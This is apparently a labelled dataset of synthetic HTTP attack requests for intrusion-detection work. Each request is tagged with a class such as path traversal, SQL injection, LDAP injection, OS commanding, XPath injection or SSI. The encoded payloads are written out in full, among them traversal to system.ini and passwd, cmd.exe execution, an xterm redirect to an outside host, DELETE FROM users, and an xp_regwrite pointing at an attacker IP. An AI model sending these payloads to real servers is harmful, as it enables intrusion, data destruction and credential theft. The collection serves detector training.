Accept-Charset: windows-1255, x-mac-roman, cp-950, iso-2022-jp;q=0.2, x-mac-arabic;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 150.255.125.182
Cookie: hy6eohSai=64010;un=970201;rhrlosQc4itbxo=lad9f\scriptaEapLiy;erfeneloihdgato=eet7d;enr5=lbs
Cookie2: $Version="9"
Date: Wed, 08 Nov 06 09:42:56 GMT
ETag: "NZR.pyFHpDj5.Hgrtt6w"
Expect: hor0
From: lnkmyen@hfeiUitnt.com
If-Modified-Since: Wed, 03 Nov 04 05:21:07 UTC
If-Unmodified-Since: Sat, 10 Sep 05 08:06:17 UTC
If-Match: "RUAhRQuaddwan0YNHe"
If-None-Match: *
If-Range: Sun, 16 Jul 06 21:48:13 UTC
Max-Forwards: 587
MIME-Version: 5.3
Pragma: hulinc8='tas2c6e'
Proxy-Authorization: ha2n eocndmf=oIeb
Authorization: to1O rsdr=henah
Range: 81947-,357703-
Referer: /rrepoHxr/nsveT/fpss.tiff
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/6.4 (X11; U; Solaris 2.6; em-n4; rv:7.8.2) Gecko/17036448
UA-CPU: PowerPC
UA-Disp: 096,9977,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0549x672
Via: FTP/5.1 www.t4wqkngc.gif, 2.2 189.183.98.129, 2.9 67.15.176.169
Transfer-Encoding: nerloe; tskaOnc=tsqll
Upgrade: impc/6.7
Warning: 645 115.27.59.90:9013 "qanewiWttmahnnlyit1n" "Thu, 03 Mar 05 21:14:02 GMT"
X-Forwarded-For: 150.61.102.195
X-Serial-Number: 61308570883843
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45869
Start - Id: 45087
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.1
Host: www.thmld.uk
Connection: close
Accept: text/*, video/*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.3, identity, gzip;q=0.1, gzip, gzip
Accept-Language: *
Cache-Control: min-fresh=19350
Client-ip: 214.121.21.204
Cookie: evl4bir=42314;Ef0rj=oe7arWFhr7tse8;tckllelebd=455904
Cookie2: $Version="49"
Date: Mon, 22 Oct 07 17:00:14 GMT
ETag: W/"ripDnExYI_q8e4R"
Expect: 100-continue
From: NT7ihoi@svOy.it
If-Modified-Since: Wed, 30 Nov 05 11:41:10 CET
If-Unmodified-Since: Mon, 20 Mar 06 13:02:50 GMT
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: *
If-Range: Sun, 11 Mar 07 04:04:23 CET
Max-Forwards: 80
MIME-Version: 2.7
Pragma: ly4z='pj'
Proxy-Authorization: Digest cnonce="lEha"
Authorization: Basic dHRsZGVuZGk6amZsaw==
Range: 61-,599945-,96-
Referer: http://taeint.biz/5dis/ssciIi/Segtuss/ynjDe.swf
TE: deflate;q=0.0,gzip;q=0.0,trailers
Trailer: Connection
User-Agent: Mozilla/5.2 (compatible; MSIE 8.3; WinNT; i7or)
UA-CPU: StrongARM
UA-Disp: 0628,6146,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 213x015
Via: 2.1 www.nmIjfen.jpg, 6.3 54.170.128.53
Transfer-Encoding: identity
Upgrade: ttpNf/8.4
Warning: 437 www.epd64fo.jpeg "eNe3tlcu" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 95535933478300
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45087
Start - Id: 45646
class: PathTransversal
GET /nHtptYPWTOqX7LLNoOA/2mncnouowtumdonf/olFCJej7cw50.shtml?dteMe=02&Ehp0awntNurhet=39191&EabWater=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fmees%2Fitasveroli%2Froet%2Fin.bin&bht=ifil&IJcaWgF=rhgths&lir1sftid5rejs=4556915&RWvVDk=%26o1Dfo%3D0itu%24vshq&lghxeEIenre=os+&seirswkmcu=ebh%5Db&iMivyCObM=%5Btya&wje=tt%26go&tofwctra9rre5=17&enetmottzre4k9=os4riaeo9twhrag&ncr2=%7EemtEn&tshutdown8e26tnvqk=group+bycmtrhnE%26eQ HTTP/1.0
Host: www.e1hryqn.it:80
Connection: p6zieZc
Accept: */*;q=0.2
Accept-Charset: euc-tw;q=0.1, windows-1255, hz-gb-2312, x-mac-japanese;q=0.6, x-mac-cyrillic;q=0.5
Accept-Encoding: identity;q=0.7
Accept-Language: 7-n;q=0.2, Lczo7tA-9r6s1og, rllEcd-una, nljl-ohagDn;q=0.0, mbetc-in2t;q=0.1
Cache-Control: no-store
Client-ip: 168.189.41.184
Cookie: replaceZDkD=25
Cookie2: $Version="45"
Date: Sat, 05 Aug 06 08:01:00 UTC
ETag: "RTvIwIez8XcexdzB"
Expect: 100-continue
From: f6eo@ixbm.net
If-Modified-Since: Mon, 17 Jan 05 06:41:48 GMT
If-Unmodified-Since: Fri, 08 Jul 05 04:39:23 UTC
If-Match: *
If-None-Match: "CsVD4hVl9bZ83fJ"
If-Range: *
Max-Forwards: 374
MIME-Version: 6.6
Pragma: oa7Trtdv='wedv'
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: 6203-437,-66
Referer: /94dpR.png
TE: gzip,trailers
Trailer: Upgrade
User-Agent: Mozilla/7.0 (Machintosh; U; PPC 4.7; tr-ho; rv:4.3.3) Gecko/33691411
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 822x7787
Via: HTTP/9.2 www.taayee.shtml
Transfer-Encoding: npem; 4tirq1=vykbdsk
Upgrade: 8mc5/8.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 4318148965798
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45646
Start - Id: 38763
class: LdapInjection
GET /hfTAQ/hmEpSRMbj0qibj/8d1st0lo/rRv2j7WuotBU-7Sr.tiff?htTt4=5cmChT-c&s_scriptq8VNNok@=T&4la1MauEhsb=m%5CJjtnlpaecloe&PeYZhATyNIB=caeotexool%26t%5Dhcdoy&uchuesrtinabteg=2&v4c=hqd&oqvvi=apia&aunuot78cGhmCW=T%3E&nlEd=%5B7gc&desPHbhphletmee=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&nerietihl1sq=yc&LEageioeot=inL2eQxh&ss6it4hSNymdh8=hd%3F&bKmeedewr=rrE%28a+s%29aj%29t&uh7emd0An0=33 HTTP/1.0
Host: www.bIDeo3tecE.com
Connection: close
Accept: */*;q=0.1
Accept-Charset: windows-874;q=0.9, x-mac-roman;q=0.1, windows-1257
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 134.201.148.112
Cookie: seame=rtnnoors;Iasgisrs0A6=nah1tsbrsrhciue;herau9tatww=11790850;nalrayuaAtakr=n
Cookie2: $Version="4"
Date: Tue, 11 Apr 06 24:55:37 CET
ETag: W/"slBMokRXBctBPJw"
Expect: iwaga4ao=ehlt
From: Dddcd@u4uew8d4.be
If-Modified-Since: Thu, 27 Dec 07 05:19:33 CET
If-Unmodified-Since: Sun, 19 Feb 06 14:14:40 GMT
If-Match: *
If-None-Match: *
If-Range: "04Jj6asrCLCUaQfynbO"
Max-Forwards: 1291
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: NTLM c3JvdGV1M0UzZVJmMThtYXVBcGxlbmVUbjNOZGR4Zm9oc0Ewc2w=
Range: 7-
Referer: http://www.r9rinml.ch/grtmAin/acIw/getmckt/ndkgii.png
TE: trailers,gzip;q=0.1,trailers
Trailer: Range
User-Agent: iUDsYzHdm http://www.tsyo.fr
UA-CPU: Sparc
UA-Disp: 372,5525,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8698x991
Via: FTP/8.2 www.bsoflia.jpg, 5.4 www.eeags.png
Transfer-Encoding: gzip
Upgrade: qUr/2.7, rRt/2.0, b9eynm/6.6, RsT6/5.1
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 15.223.231.187
X-Serial-Number: 99237184639
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38763
Start - Id: 44426
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 250.189.196.207
Connection: close
Accept: text/*, application/*, image/*;q=0.0
Accept-Charset: iso-10646-ucs-2;q=0.6
Accept-Encoding: *
Accept-Language: Iodsiw-v7;q=0.4, ezaal-Ie, 8x3-znny, rnstti-f0ta;q=0.2
Cache-Control: min-fresh=21
Client-ip: 27.105.36.250
Cookie: eoadr=4847
Cookie2: $Version="74"
Date: Thu, 16 Feb 06 24:55:34 GMT
ETag: W/"pH3z7Lb_BNHVotjveEcj"
Expect: 100-continue
From: i1nh90u@tvpyl.biz
If-Modified-Since: Sun, 02 Aug 09 20:15:30 CET
If-Unmodified-Since: Mon, 29 Dec 08 06:09:27 GMT
If-Match: "hQOO.YwZs1b3wzs_H"
If-None-Match: "pc2xKH6cbzmo6vafF"
If-Range: *
Max-Forwards: 5
MIME-Version: 6.2
Pragma: o=brtsHn
Proxy-Authorization: Digest cnonce="orIrleta"
Authorization: Basic MHV5ZUxhOjduZXM=
Range: 6-02287,72753-
Referer: /remn/nfedferr/eitsnc/p0vSs/ioUra5e.mdb
TE: deflate;q=0.1,chunked
Trailer: Accept-Encoding
User-Agent: iSocstd (eomm5C9SDF; sXRIqJB; lOiNE-NLC; vCj_PE; t-r7D@EK9)
UA-CPU: Sparc
UA-Disp: 4806,9378,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 053x237
Via: 8.6 248.170.100.124:6
Transfer-Encoding: gzip
Upgrade: esoj5m/0.8
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 156.154.164.214
X-Serial-Number: 850961396
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44426
Start - Id: 49903
class: XPathInjection
GET /es0srecpSahrcEt5a2a/goaB3/q_M.pl?ddjtnu=1sgpuomiopenefgiv&neBSnaa=nweo%2F&yabeeigtttat=ayVkaQ&DsmtUsa7n3ze=2698&Xs9nl9rHSteaai3=dphp2e4j%7Czx%2F%3Dtom&hc0tnmniTass=9%40iWXmThsX&z_ABl=ltpboea%27+++++or++++1%3C+iaha0%2Fs3esuf%2Fia%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D5%5D++or+++++%27mwiieeo%27+++%3D+%27&same=autoexecnt&ceoithttdDksS=%27g%29oen&1oo=iai&3Aftd=yupdor&QAsJq=5355463316 HTTP/1.1
Host: 236.164.149.74
Connection: close
Accept: application/*;q=0.8, text/*, image/gif
Accept-Charset: us-ascii, shift_jis;q=0.6, windows-1251;q=0.7
Accept-Encoding: deflate;q=0.7, identity;q=0.2, compress;q=0.1, gzip;q=0.7
Accept-Language: iipo-tvens, erab1hl-HeTboi;q=0.2, e-Eftses;q=0.4, n7rtrsTM-jC;q=0.4, t4qh-msao
Client-ip: 85.238.239.22
Date: Sat, 06 Mar 10 23:15:40 UTC
If-Match: "rg_u.3caOA7OkZpsy"
Max-Forwards: 67
Authorization: Basic b25hbmNhbnI6U3NmYW9zWHY=
Referer: http://t0jEtE.uk/eoap/7oias1/uhsNgcke/teesEtda/fyooen.php4
User-Agent: nwLKLvW http://www.orat.com
Via: FTP/6.7 www.u20vtabt.shtml, 0.6 251.79.16.174, HTTP/8.7 www.Ubpatir.htm
X-Serial-Number: 70298520558

null

End - Id: 49903
Start - Id: 43120
class: OsCommanding
GET /iyuSO558VP9fXI.asp?enyIbodita=%250A++++xterm+-display+++www.vetoenre.com%3A0.0+ HTTP/1.0
Host: www.haouzehe.st
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: windows-1250
Accept-Encoding: *;q=0.8
Accept-Language: e-bammv6;q=0.2
Cache-Control: louc='5yfamgs'
Client-ip: 147.97.228.238
Cookie: vraaSg=yac;3s1Qtfrom_7=54849
Cookie2: $Version="389"
Date: Wed, 22 Feb 06 18:38:41 UTC
ETag: "C-hPZ3ueFN8_yN2Vv"
Expect: kree4Ne
From: ydaj1@ewfas0rh.de
If-Modified-Since: Thu, 04 Feb 10 19:34:00 UTC
If-Unmodified-Since: Thu, 07 Feb 08 22:30:03 UTC
If-Match: "3dNO5YgDRuatuL8yL"
If-None-Match: "kdmInhjGX8@PH0Zx1S"
If-Range: Sun, 16 Jan 05 16:22:29 GMT
Max-Forwards: 182
MIME-Version: 9.7
Pragma: TI7holwt=r
Proxy-Authorization: NTLM U3RsZWhhcHRlVGE4bG9zYWVocnNYYWFhc3lsajd0ZVV0aDhsbm9ocmFpYQ==
Authorization: Digest cnonce="sodp"
Range: 94856-,22-022
Referer: /eostn/ttFaes/aNFeeyur/Hapr7is/assei.htm
TE: gzip;q=0.9,trailers,trailers
Trailer: Host
User-Agent: ielctsginodnnkh
UA-CPU: 68000
UA-Disp: 046,4473,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 603x2268
Via: HTTP/2.4 www.aoees.png:4
Transfer-Encoding: identity
Upgrade: gst/8.6
Warning: 169 190.90.41.27 "mteulHh6dilaof" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43120
Start - Id: 45360
class: PathTransversal
POST /vrbfTs2gTHknwgTCa/rerqicuad0bm6rir/KqKE/oemhorboAlFeno/mthsouavrshx1AtdRe/MformexecerfH_MF/wd13My6ISlInPPq@C.aspx? HTTP/1.0
Content-Length: 206
Content-Language: y9rcr
Content-Encoding: identity
Content-Location: http://www.ldleei.de/qgia/ccdcwsi/gosb.dll
Content-MD5: dDZ0TGFrYmxqQmJmc2VBdQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 06 May 08 13:49:33 UTC
Host: www.tko7bho.ch
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ws-H;q=0.6, natv-rsb, rDshx3t4-ASe4;q=0.6, h-ipsO8i, g2dcb3l-ttetufT
Cache-Control: no-cache
Client-ip: 5.61.157.47
Cookie: EleEtaeoi9o=349;zg01Jnc8fAfX=lrn]thi5 cdecho
Cookie2: $Version="976"
Date: Sat, 08 Oct 05 24:46:43 GMT
ETag: W/"U2a0GiJc3J0cPtWSB_w4"
Expect: 100-continue
If-Modified-Since: Wed, 16 Dec 09 10:23:14 UTC
If-Unmodified-Since: Thu, 09 Feb 06 12:22:53 GMT
If-Match: "XLW0ur@4Xfo75Sl2"
If-None-Match: "W13Lr9PZLtNYx7nB81zj"
If-Range: Sat, 28 Nov 09 16:48:34 UTC
Max-Forwards: 0
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM OWl0bmdqbmhuZTZNbmllYnJUS1NlZTBvbW5yaXJvRWFpZ2VlaGUxZURzYWd4
Range: 53-,6570-433377,-5771
Referer: http://niw1jv.ch/prhcawt/SeiaoslL.tar
TE: gzip;q=0.6,chunked;q=0.0,trailers
Trailer: Trailer
User-Agent: skeeebhht (dqG0NV4tk; tm2Z.smZMZ; a0HLJZb)
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Pixels: 822x200
Via: 8.4 www.35mpne.tiff:9509, FTP/5.3 www.8hsi62.jpg:65259
Transfer-Encoding: gzip
Warning: 478 20.131.244.84 "nL6r2ouvmnheNdq" "Tue, 20 Feb 07 12:02:29 UTC"
X-Forwarded-For: 42.158.87.228
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qrioeieceehrrr0=ae evalefenChfgcRs&oeaAwe9le=o25NAf..G&1tSnh=z6se8sgebo&esaeedomtwn=..\..\..\..\WINDOWS\system.ini&ErDt3nwwsyo=ates5n&oi6e1imncYsqt=acG0&tt6S6thNrqauun=3135469&nts3htteuld3a=543091

End - Id: 45360
Start - Id: 35430
class: SqlInjection
GET /def9nbswgh5aee/ou/rutJH/cl/tUek/5@g@vJlam/o90yyYkkYgjOpyoW4XL/Bdnp7.dll?dkcfpa3E=rgqeMe&FPhGy=libdl&jg5id7jUscriptC=7601&i2qonu0reor=psssaerxhntu&YMG6uRN.Y=Juse%3Az%26%3Eo%5DI8ch%7C0an&Dt-bmQO=9089&rteTatnAvuwa=9&s3ensrHemnlc=rms%3D2ahiTlufco&sqca3RiialA=7&5q3OWjCt0_h=me%27%29%3BDELETEFROMusersWHEREupper%28username%29++++%3D+++upper%28%27admin&9d=6042433&edlnaomzzfrpa=849 HTTP/1.1
Host: www.loeoy832.it
Connection: csthmteh
Accept: audio/*
Accept-Charset: iso-8859-1, iso-2022-jp;q=0.9, windows-1252;q=0.9, iso-8859-4
Accept-Encoding: 
Accept-Language: Tsai-in;q=0.9, tss2-trne;q=0.9, 8-ik2tudae;q=0.1, iy-6, ipehaXd-pn
Cache-Control: no-transform
Client-ip: 185.9.17.112
Cookie: tReH=d2YqD;wbeae=27680106;2ln=9156;rswutu6aeatiyl=uslsadaHoncivUlNti
Date: Fri, 18 Mar 05 20:04:11 CET
ETag: "YTG2LO7_ImU6D9U"
Expect: 100-continue
From: wgttuate@lrahn.uk
If-Modified-Since: Tue, 03 Jun 08 13:02:12 CET
If-Unmodified-Since: Sun, 10 Jul 05 15:52:31 GMT
If-Match: "Ns2qeLzPL43qZNjVc"
If-None-Match: *
If-Range: "VjBik4dYmof3Qr6XC"
Max-Forwards: 7
MIME-Version: 3.1
Pragma: t=rpe
Proxy-Authorization: NTLM ZWllYWFub2lSc3Nyc21VbnJwYWVtZWNudWF1dU56MW90d3BvbGhhdWNh
Authorization: Basic bzJoa21naWU6YUdudHlt
Range: 1117-95,491-
Referer: /rsbto6ho.fgf
TE: deflate;q=0.7,chunked;q=0.3
Trailer: Trailer
User-Agent: Mozilla/8.8 (compatible; Konqueror/8.2; Solaris; hysr)
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4231x7309
Via: aIwots/0.8 www.mtsp9dir.js, FTP/0.4 95.188.146.91:388
Transfer-Encoding: identity
Upgrade: a1uoii/9.3, 2Nnr06/6.4
Warning: 213 www.ha181.png "anao" "Fri, 28 Dec 07 24:10:22 UTC"
X-Forwarded-For: 115.143.230.10
X-Serial-Number: 323144017545
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35430
Start - Id: 35183
class: SqlInjection
GET /BCbr/39g8/access_logM2EstyleKQ86/i0e@Niy/srM7/abenab/sl8een5DHg3/sAHB/enxsebe.bin?X4locationb5QTesam9hv=77275&elibHa=eetumK&ya38eimdnslfl=p3mWyeD&oaimYt0erR=lx4Nl&mo=t%5Cho6+Tntetcnullen&he=5aunioni&siteaAEnig9tin=74513&r0n3ycsoyn=nimbgsound&ialqc2Epdlyas=OR+3%3E07369617884&0oterte=i HTTP/1.0
Host: www.trEos.de
Connection: close
Accept: text/*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.2
Accept-Language: zioiD-eeoLyest
Cache-Control: eea=e8mkAx1f
Client-ip: 116.56.251.175
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="711"
Date: Sat, 13 Jan 07 06:18:34 GMT
ETag: W/"MmDAZwouxSzTM9a"
Expect: twhn
From: as5oeh@nl7ehee.ch
If-Modified-Since: Tue, 23 May 06 16:55:25 CET
If-Unmodified-Since: Fri, 21 May 04 18:51:43 GMT
If-Match: *
If-None-Match: "UkwHvXsSWbTZVHc834"
If-Range: *
Max-Forwards: 052
MIME-Version: 2.3
Pragma: AdmndsSs='5oUov'
Proxy-Authorization: ortr bdoanD=ot23oe
Authorization: ea2oq rvfukh0=4ucd
Range: -76801,392-,94069-
Referer: http://www.rrna.st/a06dntr.mp3
TE: trailers
Trailer: Referer
User-Agent: a3lGJ- http://www.eiub.fr
UA-CPU: StrongARM
UA-Disp: 1981,291,8
Via: FTP/3.0 www.idnZ5dhb.shtml:8947, 0.8 www.eosg.tiff, 8.2 226.51.246.82
Transfer-Encoding: gzip
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35183
Start - Id: 42165
class: SqlInjection
GET /_VKXO56L/Kg/xeltele.shtml?jogWlibLdocument=9se&yaietwFluuaewaw=and+0%3C%3E%28select+++++count%28*%29+++from+++++yt+++++where+4ijel%3C%3E%29&F9ttuu3Ehtpasssh=230992&ciA5e=227335595&NP.BE9u@=7&jcnb0u2=r8dv2&eiciees=231417&044dr1h9harA=shn&sepl=1ld&nnodehdocumentM=xtttEhT&gqoosabGot=krandeeetsr4o&aeehceeieipnse=1134654&Bdt1mnd=h HTTP/1.1
Host: 233.2.7.136:98
Connection: close
Accept: image/gif;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dos9-o;q=0.6, 0O-3f;q=0.2
Cache-Control: max-stale
Client-ip: 45.250.133.235
Cookie: iitbtsprt=amotezuo;tmlehs=so-U6d1;eaearenxnosh=8855;teapl=leiwf9esruts;Be0idytQa8=9242822865;ldw85os3Iotx7h=8453076
Cookie2: $Version="82"
Date: Fri, 31 Dec 04 23:15:40 GMT
ETag: W/"q9@-@42oTbHORdulE04"
Expect: 100-continue
From: tktabU@4ahlq0ig.org
If-Modified-Since: Tue, 16 Jun 09 16:27:33 CET
If-Unmodified-Since: Sat, 21 Apr 07 06:24:09 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Aug 09 16:33:58 GMT
Max-Forwards: 7
MIME-Version: 5.9
Pragma: l5Q8eial='owbrnol'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: adtse yNrow=oah5nyg
Range: -65233,-6365
Referer: /gmami/ruee/1Euov.mp3
TE: chunked,trailers
Trailer: From
User-Agent: uerB2/5.3.2.6.7
UA-CPU: StrongARM
UA-Disp: 234,2266,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: 2.1 27.21.196.157:99, 3.3 www.a10sei.html:2, oqA/5.1 40.132.232.123
Transfer-Encoding: rnsgfm; 4o7ut=xhry
Upgrade: tNMgnj/4.8, 6nig/6.9, f01otg/5.4
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42165
Start - Id: 35930
class: PathTransversal
GET /i@@lrzDlkVKe2K_uS/cmqS2s-XH9-xV@cDkJ/kJLoautoexecjj2Lh_waccess_logshutdown/kSbe/nbWJ.0GNNWRxemwbA/n9Xc.php4?pmisu9tds=%3C%21--++++%23include+++virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E&dsod4aha=923809&eqh=6s4g+ooberei HTTP/1.1
Host: 164.46.123.101
Connection: close
Accept: image/*
Accept-Charset: gb2312;q=0.5, windows-874, iso-8859-7;q=0.7, cp-932
Accept-Encoding: gzip, compress, gzip;q=0.9, gzip
Accept-Language: 3oRi-en3et2d, xael7a-s, sI-atvazbe;q=0.1
Date: Mon, 12 Oct 09 10:25:51 UTC
ETag: W/"YdL@MxnUcp1wtpf"
If-Unmodified-Since: Thu, 17 May 07 10:00:48 UTC
If-Range: Wed, 16 May 07 16:57:35 CET
Max-Forwards: 0410
Pragma: jal=onLiyqoc
Proxy-Authorization: Digest cnonce="ei6idr"
Authorization: Basic c2NnbHlnZWU6Mjcxb3E1bDE=
Referer: http://d6eahdto.net/hnlaS/apasttes/ianeymdn/twneb.pdf
User-Agent: seshiouptq (icIVMBc6; cLawYF)

null

End - Id: 35930
Start - Id: 42114
class: SqlInjection
GET /yidstdotknL9/iB2Oongkh-ZgV/ek_caCWO3Q3zgS1Vv/agGaL/dwm/a5cweW33f4kjONr6/geltteetso/tmpbetweenACL/icePndAtxRMi@/4cYuffINEsgtK7.asp?sehrHido3shee=liadwAinput&uLtmp62u=ijuatreahq&eahwte=O5ne%27+UNION+%2F**%2F+++++SELECT+muruSe4s6++++FROM+++++dba_users++++WHERE++++uygO+like+%27%2525 HTTP/1.1
Host: www.nb1so.cz:80
Connection: keep-alive
Accept: text/html
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 139.71.160.209
Cookie: nrwnnlwow=neav3youlvayoo3Q
Cookie2: $Version="34"
Date: Sun, 30 Oct 05 06:32:10 CET
ETag: "36ABV77V@jd_sdUj"
Expect: 100-continue
From: jqr1h@steT4irua.uk
If-Modified-Since: Wed, 26 Mar 08 20:31:22 UTC
If-Unmodified-Since: Fri, 21 Mar 08 17:55:01 CET
If-Match: "PE9nmEeB@c_lsX9O"
If-None-Match: "EFDCd3IKj7.--jOC"
If-Range: Wed, 03 Oct 07 13:22:10 CET
Max-Forwards: 153
MIME-Version: 0.9
Pragma: Qe=thnohP
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: NTLM cmVvQmlubGRvaXdkbnRjc3N5anN4cmFzbTZuZWJla2RzdW9hdQ==
Range: 80-3804,023297-91,09-
Referer: http://so07ho.gov/Hk4hopUi.mpeg
TE: trailers,chunked
Trailer: Proxy-Authorization
User-Agent: nptz/7.5.9
UA-CPU: MIPS
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 830x020
Via: 4.1 www.dhejc5e.jpeg, 0.4 202.238.59.67, HTTP/6.2 www.ilSdmbnH.html
Transfer-Encoding: deflate
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 310 236.101.41.30 "heS1" "Tue, 01 Aug 06 04:08:43 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42114
Start - Id: 40440
class: SSI
GET /sIGpeanbaeDcat9grit/0e3rDa.php4?aor1ynontl7s3=38&cgd=ue&tXEVd6O8CEe=thIpjn0Mto2&oenTritcyej=d0t93mx&Lltyds=9&hbvcebuittjt=nswr&processing-instructionOM.K.@9v6yI=27041&3oea9yed1gf1=%3C%21--+%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E&GEiBCXE=etq&0LZC.2j=iiab3booxNv%7E7&ro=mocRe0l6v HTTP/1.0
Host: www.trtjtx.be:80
Connection: close
Accept: */*
Accept-Charset: gb2312, iso-8859-1;q=0.7
Accept-Encoding: *
Accept-Language: y-iaunA82, it9Ls-ano, tiasw-eieEx
Cache-Control: no-store
Client-ip: 160.80.33.186
Cookie: 4execqvc=2996347;iyrtvbonE=EsvbscriptnrFoois]d;okyistotherxny=rY2Ow
Date: Mon, 02 Feb 04 08:02:45 GMT
ETag: "79lGeyuaKa8H77Rj"
Expect: 100-continue
If-Unmodified-Since: Wed, 15 Nov 06 03:21:44 GMT
If-None-Match: "@DLQXcomO4gjTOJf77"
If-Range: *
Max-Forwards: 1
Pragma: inenhi5=ecn
Referer: /sijf/oMh8/elsnt.sh
TE: chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.2 (compatible; 1tltPHacH; Linux i586; onicsnruta; e8oNeo6)
Via: FTP/4.5 224.19.30.26
Transfer-Encoding: compress
Warning: 443 www.5emltolE.shtml "ixeE7snpEfe8zdm" 

null

End - Id: 40440
Start - Id: 41130
class: SqlInjection
GET /uHRDG.like@g04vK/gFGrex/8Pq9gn/hntetsTassis/6otjakolh076/cJRQXKz/i2Ajsb7B/eNTSVuvra29neK.js?5lwsTk4qftS=%27r4s&oz4lSaHarO=hl&zin=exec+++++xp_regwrite+++++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27iuemwhsse%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&cOhmmnolksbaptE=oru4zh&metfEb=9094352&O_mailJZlvY-Te=7763106807&oiil=a+o%27lagtsi%3Du%28ie%28c%3E7&eFqt=jchv HTTP/1.1
Host: www.asntleZbe.com:29
Connection: nInfd
Accept: application/*;q=0.0
Accept-Charset: windows-1251, x-mac-chinesesimp;q=0.7
Accept-Encoding: gzip;q=0.5, deflate;q=0.6, compress;q=0.1
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 225.169.58.33
Cookie: gNhCqt2divshutdownVDO=ne5eaia5is6ricyr;tfssdniewbeg=ees(g eval/r;zyF1sm1J7=reelA\n;tu=Mre;lhRmm=sS84pn;b5b0TUat=gnxAOJrt8
Cookie2: $Version="08"
Date: Mon, 28 Mar 05 18:00:02 UTC
ETag: W/"790v1BWe27ma-42PSUKK"
Expect: 100-continue
If-Modified-Since: Thu, 30 Dec 04 21:33:44 GMT
